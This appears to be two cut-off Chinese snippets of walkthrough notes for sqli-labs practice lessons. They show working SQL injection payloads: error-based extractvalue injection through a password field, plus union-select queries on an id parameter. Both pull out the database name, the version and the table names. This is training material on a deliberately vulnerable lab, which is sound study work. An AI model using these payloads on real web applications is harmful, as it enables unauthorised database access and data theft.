(1)无论怎么输入username,都没有回显.尝试改变password的输入.找到了闭合方式:单引号 (2)报错注入: 爆库名 admin&passwd=admin' and extractvalue(1,concat(0x7e,(select database())))and '# 爆表名: uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from inf…
less2 同Less1相同,存在注入点 输入 ?id=1' 说明我们输入的数据被原封不动的带入了,无需要在1后面加单引号 (1)爆字段 ?id=1 order by 4 字段为3. (2)用union联合查询 ?id=-1 union select 1,version(),database() Php版本为5.5.53,数据库名字为security. (3)爆表 ?id=-1 union select 1,group_concat(table_name),3 from information_…